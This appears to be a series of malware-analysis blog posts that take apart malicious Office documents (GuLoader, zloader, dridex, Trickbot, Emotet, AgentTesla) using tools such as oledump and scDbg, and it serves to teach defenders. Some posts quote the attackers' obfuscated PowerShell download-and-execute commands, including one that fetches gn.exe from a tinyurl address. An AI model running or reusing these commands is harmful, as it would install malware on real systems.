oleObject1.bin – OLe10nATive – shellcode

I came across a GuLoader .xlsx document the other day. It didn’t have any VBA or XLM macros, locked or hidden or protected sheets, or anything obvious like that. Instead, this is the only thing I saw in oledump.

It was a bit odd. So let’s see what it takes to tear apart a document such as this. If you’d like to play along, here’s the specimen: https://app.any.run/tasks/706a2ec9-c993-40e0-811a-b18358531b24

A special shout out to @ddash_ct! He helped point me in the right direction for extracting the shellcode.


Upon unzipping the file, we can find oleobject1.bin inside the XL/EMBEDDINGS folder.

If you will recall, OLE stands for Object Linking and Embedding. Microsoft documents allow a user to link or embed objects into a document. An object that is linked to a document will store that data outside of the document. If you update the data outside of the document, the link will update the data inside of your new document.

An embedded object becomes a part of the new file. It does not retain any sort of connection to the source file. This is perfect way for attackers to hide or obfuscate code inside a malicious document.

OLe10nATive stream

oledump.py showed that the oleObject1.bin contained a stream called OLe10nATive. These are the storage objects that correspond to the linked or embedded objects. That stream is present when data from the embedded object in the container document in OLE1.0 is converted to the OLE2.0 format.

We can extract this stream by using oledump to select object A1 and dump it to a file.

Looking for shellcode

Now that we’ve extracted the stream, how are we going to find anything useful in here?

This is where the advice from @ddash_ct came in handy. He searched this stream output for a hex string like E8 00 00 00 00 and was able to extract the shellcode from there.

Why is this the case? And why that pattern?

Shellcode cannot assume it will be executed in any particular memory location. It cannot use any hard-coded addresses for either its code or data. This means it must be position-independent. A hex string such as E8 00 00 00 00 can be an indicator of where position-independent code may start. While the example below is not from our sample, the opcode E8 00 00 00 00 is translated into the instruction call $+5. This is used to push the current address in memory onto the stack. This can serve as a sort of anchor point for the rest of the code execution.

This is just an example and is not from the ole10native stream in our sample.

We will not find the exact E8 00 00 00 00 pattern in our file. Instead, we can search for a pattern like 00 00 and something interesting pops up at 0x00265D41.

While we do see a similar pattern, there is a significant difference. The opcode E8 is making a call and will be transferring control to location 0x000000AF. However, the location of AF is relative to E8’s position in memory at run-time. It seems we may have an instance of position-independent code and it might be where some shellcode is hiding. Got that?

All this is to say that hex location 0x265D41 is a likely candidate for our purposes.

Extracting the shellcode

From here on out, this will be a very similar process to getting shellcode from .rtf documents. We can load up ole10native.bin in scDbg with a start offset of 0x265D41. We know we’re on the right track because we can see the unhooked call to ExpandEnvironmentStringsW.

Earlier blog posts showed that scDbg doesn’t work very well with ExpandEnvironmentStringsW. Instead, we can overwrite that with ExpandEnvironmentStringsA. To do so, we will need to unpack ole10native.bin. We do that by checking the box in scDbg for “Create Dump” and re-launch ole10native.bin using the same start offset of 0x265D41. scDbg will then save the dumped and unpacked file. In my case, it was called OLE10N~1.unpack.

Open up the newly unpacked dump file and scroll to the bottom. You will see a variety of commands in plaintext. Offset 0x002660D9 begins the command for ExpandEnvironmentStringsW. Overwrite the appropriate location with an A and save the changes.

Before we toss this into scDbg again, we are going to need a new start offset. This can be found at the beginning of this part of the shell code. Notice the pattern right before k.e.r.n.e.l.3.2. It also follows the E8 00 00 00 00 pattern.

Toss our unpacked and edited binary into scDbg and enter 0x00266080 as the start offset. And when we do, the shellcode commands are revealed.

Thanks for reading!

Practical Malware Analysis (the book)

XLSB: Analyzing a Microsoft Excel Binary Spreadsheet

The @InQuest crew has been putting some unusual documents out on the Twitters and I thought I’d take a closer look at one of them. And as ALWAYS, new documents are never that straight forward to analyze. Attackers always put a twist on what has already been done.

In this case, we’ve got an .xlsb file, XLM code, hidden sheets, protected sheets, and the ever-so-sneaky-hiding-in-plain-sight white font.

Here’s the doc: https://app.any.run/tasks/47e1c347-664c-4ada-9655-1724387e859e/#

Microsoft Excel Binary Spreadsheets (.xlsb)

I can’t say that I’ve ever seen these until now. They open and function like any other spreadsheet. The difference is under the hood. They store the spreadsheet using a binary format (BIFF12) rather than the typical .xlsx or .xls. This means that .xlsb files are usually bigger as they’re not compressed. Extremely complicated spreadsheets (ones with lots of formulas, charts, and shapes) can benefit from this file format as they may save and load much faster.

But this format means that some of our normal analysis tools do not work. For example, oledump can’t find any OLE objects in the file.

OfficeMalScanner will expand the document if you use the inflate option. However, the output doesn’t show the normal vbaproject.bin. There’s a ton of other files that are NOT vbaproject.bin. (Of course, there’s no vbaproject.bin. Oledump.py didn’t find any macros, right?)

In hindsight, all of these .bin files make sense as this is an .xlsb file. It certainly didn’t make sense the first time I cracked it open, though.

Analysis from within the document

First, there are a bunch of hidden sheets.

Quite a few of these sheets contain a lot of nonsense.

However, Auto_Open is pointing to Sheet11!A1. If we go there, we can see a empty columns containing XLM in white font.

And of COURSE we can’t edit the font because a bunch of these sheets are protected AND we don’t have the password!

It is possible to enable content and step through the XLM like we’ve done before. However, the other sheets contain macro code and characters that are spread out all over the place. That’s annoying enough to analyze even if it wasn’t in white font.

Unprotecting the sheets

All hope is not lost. We can bypass the protected sheets if we save the document in a different macro-enabled format like .xlsm. This will also change the worksheets from .bin files to .xml files. This will be important in a moment.

Change your newly created .xlsm file to a .zip and navigate your way into xl\worksheets and xl\macrosheets to find .xml sheets. We will un-protect these sheets by taking out a section called sheetProtection. Delete everything from <sheetProtection to its trailing />, including the two < > characters, and then save the .xml. Delete sheet protection wherever you find it.

You’ll have to drag the various .xml files out of the .zip file, edit them, and then copy them back into their appropriate locations. Finally, change the file from .zip to .xlsm.

Analyzing the XLM

Now that the sheets are unprotected, we can finally get rid of that white font and see the XLM. Auto_open is pointing to Sheet11!A1. I color-coded the extraneous lines and analyzed the three important =CALL() commands.

Ultimately, it downloads a .dll to C:\ProgramData\fps\ and registers that .dll via rundll32.exe.

As a bonus, Excel does some of the XLM concatenating for us making analysis easier. Here’s an example from Sheet1. You can see that cell L3 contains =CONCATENATE(Sheet…), but the cell itself shows the result.

Good times!

Thanks for reading.

Snake/404 Keylogger, BIFF, and Covering Tracks?: An unusual maldoc

It’s always interesting to see how attackers take a variety of techniques and wrap them up into one document. Some are so heavily, heavily obfuscated that it’s rather easy to point and say, “Oh, the malicious stuff is probably in there. I should focus on that.” Others are rather sparse and you have to spend some more time digging to put the clues together.

This evening’s document is the latter (https://app.any.run/tasks/6b24ab8c-1626-41e1-aa32-39e96fd266d5/). It contains password protected macros, but they’re empty. There’s an XLM line that isn’t difficult to find and decode, but that single line doesn’t explain how the .exe gets downloaded.

All in all, the complication was finding the bits and pieces of code in the document and putting them together to match the Any.run behavior.

The Obvious XLM

If you open the spreadsheet and search for “=”, you’ll end up in cell H177.

The hex isn’t tough to decode. You end up with something like the command below. Powershell is used to change to the $env:appdata directory and execute gn.exe.

=EXEC(powershell -w 1 -EP bypass stARt-slEEp 25; cd ${enV`:appdata};.('.'+'/gn.exe'))

However, where does gn.exe get downloaded?

BIFF – Binary Interchange File Format

BIFF is the binary file format that is used to save Excel workbooks. This binary format is more commonly referred to as XLS or MS-XLS and has been the default format for Excel through MS Office 2003. There have been a variety of BIFF versions over the years due to the new versions of Excel (BIFF2 – Excel 2.1; BIFF3 – Excel 3.0; BIFF4 – Excel 4.0, etc.).

.xls files are structured as OLE (object linking and embedding) compound files. These compound files can store a variety of streams of data. One such place is in the BIFF records of a Workbook stream. We are used to using oledump.py to search for and dump macros. Yet as I said above, these macros are empty.

oledump.py -p plugin_biff

oledump.py also lets us look through the BIFF records. We can do that with this command:

oledump.py -p plugin_biff --pluginoptions "-x" [document.xls]

There’s a lot of output here so let’s take a look at it. The first line shows that a very hidden macro sheet exists. We’ll need to take care of that. The fourth line shows that there is a cell with the name Auto_Open which will execute as soon as the document is opened.

The remaining output shows FORMULA cells that will get executed in some way. Some of it is parsed successfully, others not so much. Either way, we can see a tinyurl.com address. this is most likely the URL from which the .exe gets downloaded. These formulas are stored somewhere. Let’s get that very hidden macro sheet unhidden and see what we can see.

Unhiding the macro sheet

This process of unhiding a macro sheet is outlined in more detail here. Essentially, we need to toss the following VBA in a macro and execute it. Of course, the macros in this document are password protected, but other posts of mine show how to bypass it.

This VBA code uncovers a new sheet in the document. We will need to change the font color from white to black to see them.

We can see the typical GET.WORKSPACE checks for a mouse (line 126) and the ability to play sounds (line 127). After that, it takes the macro code from Sheet1 and copies it to D131.

Line 129 contains the obfuscated line that does the actual downloading:

powershell -w 1 (nEw-oBjecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://tinyurl.com/y7zcye22','gn.exe')

We already saw the deobfuscated command in line 131 above.

Covering Tracks?

XLM code has the ability to make actual changes to the cells. This, in effect, also makes changes to the document itself. Line 138 will save whatever changes have been made thus far. And what do we notice happening right before that save? A blank cell is copied on top of 131, a cell that contained the command to execute gn.exe.

My first thought that the purpose of overwriting line 131 was to make it tougher for incident responders to analyze a possibly malicious document. I also initially thought that it was a mistake to overwrite line 130 as it was blank already. It seemed to me that 129 would be a better candidate as it contains another of the smoking guns that downloaded the malware.

I don’t think this is likely for two reasons. First, if my theory is true, it means that each malicious document in this campaign can be used only once. Once the XLM code is enabled, it gets one shot to reach out, download, and execute the malware before cleaning up its own tracks. There is no opportunity for the victim to try re-opening the document and getting infected again. Second, there is no XLM code to overwrite the obfuscated command in Sheet1!H177. I think that if an attacker were concerned about covering his tracks in this way, this other command should be deleted as well.


So like I said, this document was unusual. It contained a lot of things we’ve seen before like XLM, very hidden sheets, and password-protected macros, but this was a new combination of a variety of techniques. Plus we saw the added XLM commands that delete lines. If someone’s got a better theory about its purpose, I’m all ears. I just wonder if we’re going to see this technique more often? Ideas do have a way of getting around.

Thanks for reading.

zloader: Simpler XLM and hidden encoded strings

It has been awhile since an interesting document came across my desk. The XLM and sandbox evasion checks in today’s document were different enough where I wasn’t sure if it was going to be zloader or not. But grabbing the executable and tossing it into any.run (or tria.ge, if you’re one of the cool kids) confirmed it was zloader.

Document: https://app.any.run/tasks/476caae4-d8c4-4b62-a33b-f9ce3258cd1e
Executable (any.run): https://app.any.run/tasks/7d3acbcc-d47c-408e-a42f-a8865d758f21
Executable (tria.ge): https://tria.ge/201202-6crv4myx46

Decoding Macro

As per usual, the main XLM macro is in one single column. However, it wasn’t the usual massive block of XLM code. It is conceptually the same in that variables will be set up to control the decoding loops. But rather than that information being in the XLM code itself, the XLM will grab numbers and encoded strings a different sheet. In this case, the decoding macro is in column 1 of sheet JattwdYRiEl and the encoded strings and loop control variables are in Sheet1. Here is a truncated view of the macro to make it easier to understand its flow. Auto_Open sets up a location that points to the beginning of the macro to start decoding strings. vGdNGoO jumps execution to the top of the macro.

SHEET1: Populating Variables

Sheet1 contains what looks very much like some sort of encoded string. Some of the numbers and values in Sheet1 are used to populate the counting variables in the decoding loop. Here are a few examples.

A new development is the location of the encoded strings. They are now defined names within the excel document itself. These names can be found in the Name Manager in Excel. If you look carefully, you can see that a semicolon is used to separate the encoded strings in DLZETTDk.

While the decoding mechanism itself is interesting from an academic perspective, I won’t be diving deeply into it. Suffice it to say, these encoded string gets decoded character by character and tossed into variable ovTMv. Once completed, the XLM code will write the decoded string to R114C1 and overwrite =HALT(). The next string will get decoded and written to R115C1 and so on.

Decoded Strings 1

Once the first round of strings are decoded, RETURN() will jump execution to R114C1. What follows are some more sandbox checks and variable setup. It looks like a file might get written to C:\Users\Public\Documents\. R125C1:R127C1 sets up new variables for the second round of decoding. R131C1 points execution back to the top of the decoding loop which starts the second round of decoding. Those strings will get written starting on R132C1.

Decoded Strings 2

There is a lot going on in the next block of XLM code. The .exe is downloaded to C:\Users\Public\Documents\dfdMmb2W.txt as a text file. Rundll32.exe is used to execute it. Notice the GET.WORKSPACE(1) check in R134C1. If it fails, execution jumps down to R143C1. This sets up a .vbs file, populates it with commands, and then executes it. It will ultimately do the same thing by downloading the executable and executing it with rundll32.exe.

So that’s pretty much it. The main decoding XLM code is cleaner, but the main difference is that the control variables are in another sheet and the encoded strings are defined names.

Thanks for reading!

dridex maldoc: The unholy union of VBA and XLM

Kirk Sayre (@bigmacjpg) posted some info on a dridex malicious document the other day. It was a real piece of work. To put it succinctly, the VBA script grabs data from cells in the spreadsheet, decodes them, and then runs them as an XLM command. Even better, all of the cells have white font (tricky, tricky).

Here’s the info Kirk dumped from the document:


And here’s the document itself:


First things first

Before we can start stepping through the macro, we see that it is unviewable.

Enter: EvilClippy. Much could be written here about how this tool works, but just read this article by Carrie Roberts (@OrOneEqualsOne) instead. It is fantastic.

We can make the project viewable by just using –uu. It will automatically make a new copy of the document, but the project has become viewable.


lncol() is the main Sub. Much of the other logic/decoding functions branch off this one.

Lines 90/91: pic, oks, and img become the names of the new folders created and the name of the downloaded file. More on them later.
Line 92: This for loop will cycle through rows A208 to A212.

Line 94: Send the information from cell A208 along with a random number from 1 through 4 to function Ami.

Creating the XLM String

Line 45: Take content from A208, send to function verud, and put results in array df.
Line 53: Convert cell content to decimal numbers.
Lines 46-47: Take each number in array, add f (remember, that random number from 1-4), and send to function zen.
Line 39: Convert decimal number back to ASCII.
Line 47: Add ASCII character to variable Ami. Convert the rest of the array in the same manner. Then head back to the main function…

Line 95: This line is important. It checks to see if the string you just decoded ends in a right parentheses “)”. If it does, continue on to line 96. If it doesn’t, run line 94 again until you get the desired output. This is why the random number from 1-4 is important. It will keep looping and decoding until the right output is created.

Here are all five of those decoded cells. But cells A209-A212 are not complete. Certain characters in those XLM strings will need to be replaced before they can be executed.

Replacing Characters in XLM String

Line 97: This line calls up function kio which will execute the XLM string (line 105). BUT before it does that, the string itself needs to be altered. That is the purpose of function vs.
Line 108: This function takes the semicolon, single quotation mark, dollar sign, and question mark and replaces them if they’re found in the string. Those strings become the names of the directories that are created as well as the URL from which the malware is downloaded.

Speaking of URLs…

These are the remaining strings still buried in the spreadsheet. They can be found in cells A593:D626.

Function mores() decodes these strings.

Line 23: Get a random row between 593 and 626.
Line 24-29: Start with column 1 and grab that cell information. If it is empty, try cells 2 through 4 until you get a cell with text in it.
Line 31: Send that found data to function Ami. Note that the value for f is the same as the column.

Once everything is laid out, it isn’t too complicated. But get ready for either more like this or adjustments to this layout.

Thanks for reading!

zLoader XLM Update: Macro code and behavior change

We’ve got ourselves a change to the zloader XLM code and also some document behavior. Here’s today’s sample:



Central Loop Mechanism

The decoding part of the central loop mechanism still exists as it did before. It grabs hex characters from elsewhere in the document, decodes them, and writes those strings to new cells. However in this case, the document only runs through two rounds of this decoding.

Round 1

The first round behaves pretty much the same as it did before. It checks to see if it’s in a sandbox, checks the registry, and if VBAWarnings is turned on, the code will go back to the loop and start round 2.

Round 2

This is where the main difference lies. A series of lines get written to a file called QP0L3.vbs and then executed.


The code in the .vbs file is nothing that special. It’s just an array of URLs going through a For Each loop. The file gets downloaded and then saved as an .html to the Temp folder.

Back to Round 2

At this point, the .html file is executed with what looks to be rundll32.exe.

And that’s pretty much it! Again, not a major change, but I thought it was a noteworthy one.

Thanks for reading!

Trickbot: ActiveDocument.Words is the word!

This Trickbot document hid a .dll in an interesting place. If you’d like to play along, you can find the document and dropped .dll here:

Document: https://app.any.run/tasks/96c149ce-b01a-4543-a8d4-2b98bb18b9c7
Document Password: INV15
SHA256: 052C9196DFE764F1FBD3850D706D10601235DC266D1151C93D34454A12206C28

Dropped File: C:\programdata\objStreamUTF8NoBOM.Vbe
Dropped File: C:\UTF8NoBOM\APSLVDFB.dll
Dropped .dll: https://app.any.run/tasks/5bc86667-aab3-4513-a433-3697d6a9d3eb

After supplying the provided password to open the document, I suggest that you remove it, save the document, and then use tools like oledump.py to extract the macro. Notice how it keeps making references to ActiveDocument.Range(Start and End) and ActiveDocument.Words.

The macro is pulling data from the current document, piecing them together, and then writing it out to this file and location:


Once that is done, the macro creates a Wscript.exe object and executes that .vbe file.

But where did it get all of that data? Where was it hiding in the document? Well, it wasn’t really ‘hiding’ in the typical places we see obfuscated commands (I’m looking at you, Emotet). In this case, it was hiding behind the the picture we see in the document itself. We can see the text below by deleting that picture and zooming in 400%.

You can fit an entire .dll on one page of a word document if you use 1 point font. Who knew?

The macro in the document takes the above characters, rearranges them, and writes them to objStreamUTF8NoBOM.Vbe. Here’s that .vbe file.

Near the bottom of objStreamUTF8NoBOM.Vbe, we can see the base64 decoding function. It gets copied to the following location:


The last two lines create a wscript.shell object and use regsvr32 to run the .dll.

And there you go! Thanks for reading!

2020-08-05: Update on zloader XLM code

On August 5, 2020, @abuse_ch warned about more ZLoader activity:

It had been awhile since an XLM document had crossed my desk and I was wondering if anything had changed since the last one I did in mid-July? It hadn’t. I’ll be honest, these ones are a real pain to get through. But if you know what to look for, they’re not that difficult to unravel. I’ve even got some tips on how to become more efficient at investigating this particular document. Let’s get to it.

XLM Code Location

This version of the zloader document is interesting because the main activity takes place all in one column rather than being scattered all over the place. This column contains all of the loops and functions that will create, write, and execute the commands needed to reach out to a URL and begin downloading. The XLM commands begin in R337C185.

While the XLM code starts there, that is not where the entry point is located. It took some time to figure it out, but execution actually starts in R443C185.

This XLM code contains three basic steps.

  1. Set up variables and locations from which to grab hex characters and where to write new strings.
  2. Grab hex characters, convert them to ASCII, and write them to a new location.
  3. Jump to new location and execute XLM commands.

Step 1: Set up variables

For space-saving purposes, I copied the XLM commands to Notepad++ and removed the spaces between lines. Starting at the entry point (R443C185) and continuing down, some of these variables define the location of certain commands necessary for code execution. The highlighted variables below show where the hex characters can be found and also where to write the assembled strings.

Step 2: Convert hex to ASCII and write to new location

Things get kind of hairy here and I don’t know if there is a good way to explain this. Find “Start here” and follow the numbers in the dashed boxes.

Step 3: Jump to new location and execute

This part is pretty self explanatory. Once all of those strings have been written, jump to R17978C243 and continue XLM command execution. You may remember that these are the commands that are used to evade sandboxes.

Understanding the Pattern

Now that we understand how this flows, we can see the pattern. After round one is completed, rounds two and three each provide new locations from which to grab hex characters, convert them, write to a new location, and then execute them.

Rounds two and three produce this output:

Making Analysis More Efficent: =PAUSE()

The XLM function =PAUSE() allows for the possibility of debugging. We can make the macro do most of the work for us if we use this strategically.

Looking at the original XLM commands to set up the variables, placing =PAUSE() right after the call to =ebnSmgBKoRc() will allow all of the hex to be decoded and written to R17977C243. Once it hits =PAUSE(), execution will… pause allowing us to inspect it at our leisure. Make sure that you start the code execution at the entry point (R443C185). You need all of the variables populated so that the decoder function can run properly. Right-click on that cell and select run. =PAUSE() can also be placed right after the other two decoding functions to grab that data.

Thanks for reading!

Emotet (2020-07-21): Still Making Use of Userforms

DISCLAIMER: Today’s sample is not overly complicated at all. Making use of Userforms is nothing new. Also, anyone can toss an Emotet document into Any.run in order to grab the base64 encoded Powershell string being executed.

Yet, malicious documents are hiding commands that must be run on the system in some way. Finding those locations and understanding how they work can help us better understand the techniques, tactics, and procedures (TTPs) of attackers.

Sample: https://app.any.run/tasks/475e4427-efd3-40c6-a19f-8703552d0194
MD5: 6f6987737db0575b978f60be457cd374
SHA256: 12A9D51F23B64A1C6DC2146C8325AD73C6810CCDA73586EEF181C4CDDB309A99

Where We’ve Been

If you are familiar with the typical behavior of an Emotet document at all, you expect WINWORD.exe or WmiPrvSE.exe to spawn powershell.exe and pass it a big string of base64 encoded text. That base64 string decodes to a variety of commands that attempt to download an .exe from one of five URLs.

Yet, where does that string live in the malicious document? Sometimes it is scattered all over the the macro before it gets concatenated. Here’s an emotet sample from February 2019. It is quite easy to see how the powershell command and the base64 string get assembled.

At other times, the macro references and grabs strings from a Userform. In this example from May 2019, we see two Userforms named F82063 and N9_9818.

Can someone ask Microsoft to give Snip & Sketch the ability to draw straight lines?

Notice how the macro references components within that Userform. While we can see only one empty box within the Userform above, there are really a stack of them on top of each other. They each have their own name and contain some sort of text. Again, it is not too difficult to see how they will get rearranged into the familiar “powershell -e JAB…”

Where We Are Today

Emotet documents are still making use of Userforms, but with a minor twist. In this sample, the long string is brought back into the macro, split apart, and then joined to create the “powershell -e JAB…” string.

These are all of the components in the Userform named woicroib. It contains a variety of ComboBoxes, Frames, and even a MultiPage.

This macro line below references the Userform containing the the encoded text. woicroib is the name of the Userform. raopfeukchaup is a MultiPage component within the Userform. raopfeukchaup contains two pages. The ControlTipText is then grabbed from the second page. However, it looks like that box is empty.

But this is not the case. If we put a cursor in there, select all of it (ctrl + A) and then copy (ctrl + C) and paste it in notepad, we get this giant string. How is it going to be used in the macro?

Returning back to the macro, the above string is tossed into variable io (line 66). This becomes the parameter used in function chiexbeachjeuhkiam (lines 69 and 49). The entire string above is split (line 53) on another string of characters and then joined back together in line 59.

We can emulate this behavior quite easily. Within our notepad document, we can do a simple search for the string in line 53 above and when we replace all of them with nothing…

… we get the powershell string!

And as my calculus teacher in college used to say, we’ve reduced this to a previously solved problem.

Thanks for reading!

AgentTesla: .rtf and Equation Editor

While extracting Equation Editor shellcode is nothing new on this blog, it never hurts to practice the skills necessary to do this. To that end, we will be working on this document right here: https://app.any.run/tasks/0a1096aa-339e-4602-a3e0-2496a07efea4

.rtf document?

Using rtfdump.py against the document, we see that item 8 contains objdata. This is a good place to start.

We can select item 8 (-s) and decode it as hexadecimal data (-H) in order to take an initial look at that object. We can see that this object contains a call to Equation Editor (EQNEDT32.exe).

To extract this as a file, we will decode it as hexadecimal (-H), dump it (-d), and then send the output to another file which we will call output.bin.

We can use XORSearch.exe to search that binary file for various signatures of 32-bit shellcode. We see that GetEIP was found in two locations. This indicates that shellcode might start at 0xF2. This information will be useful in the next step.


scDbg.exe is a shellcode emulator. If we load up our .bin file and start with the offset of 0xF2, decoded shellcode may appear.

Based on the output, it looks like we had a good offset address. We can tell because we see some decoded lines… but not too many decoded lines. However, we’ve seen ExpandEnvironmentStringsW before and we know how to deal with that. Notice also where it says “Change found at 706…” and that it dumped to a new file called output.unpack.

The change was found at position 706. This means that there are a bunch of extraneous characters before our useful shellcode. While there are a variety of ways to get rid of them, cut-bytes.py will also do the trick.

We can see a variety of useful strings by opening output-cut.unpack in a hex editor.

One of the reasons we didn’t get this output before was that the shellcode used ExpandEnvironmentStringsW. scDbg.exe doesn’t hook into that function. Instead, it will hook into ExpandEnvironmentStringsA. If we overwrite the W in our file with an A, we ought to be able to get some much cleaner output.

Save your changes and toss it back into scDbg.exe. Note, there is no need to include an offset address or create a dump.

We now have the decoded shellcode!

Thanks for reading!